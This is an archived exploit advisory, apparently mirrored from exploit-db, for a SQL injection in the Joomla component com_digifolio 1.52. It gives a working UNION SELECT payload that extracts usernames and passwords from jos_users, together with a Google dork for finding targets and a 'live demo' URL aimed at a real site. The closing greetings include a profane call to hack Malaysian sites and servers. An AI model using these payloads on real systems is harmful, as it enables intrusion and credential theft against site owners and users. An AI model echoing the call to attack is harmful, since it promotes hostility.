exploit-db-mirror/platforms/php/webapps/9534.txt

*********************************************************************
Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability
*********************************************************************
			--==[ Author ]==--
[+] Author	: v3n0m
[+] Contact	: v3n0m666[at]live[dot]com
[+] Blog	: http://0wnage.wordpress.com/
[+] Group	: YOGYACARDERLINK
[+] Site	: http://yogyacarderlink.web.id/
[+] Date	: August, 27th 2009 [INDONESIA]
*********************************************************************
		       --==[ soft Info ]==--
[+] Software	: DigiFolio Component
[+] Version 	: 1.52
[+] Vendor 	: http://www.uwix.nl/testcase/
[+] License	: GPL
[+] Vulnerable	: SQL Injection
[+] Google Dork	: inurl:"com_digifolio"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] /**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--

[-] SQLi p0c:
[+] http://localhost/[path]/index.php?option=com_digifolio&view=project&id=[xxx]/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--
    [xxx] = Valid id number

[-] Demo Live:
[+] http://www.uwix.nl/testcase/index.php?option=com_digifolio&view=project&id=4/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Special Thanks	=> str0ke & milw0rm
RedLine Crew	=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
		=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,leQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
		=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
Others		=> g0par Santiago,Don Tukulesto,yadoy666,mixbrainwasher
		=> badkiddies,broken_hack,M3G4TR0N & ALL MOSLEM HACKERS

* Fuck to Malaysia <= the truly country stealer of asia
  be carefull your art country get stolen and claimed by them
  letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 04:30am in my bedroom, Inspirated by Yogyakarta & jovita (i really mizz you)

# milw0rm.com [2009-08-27]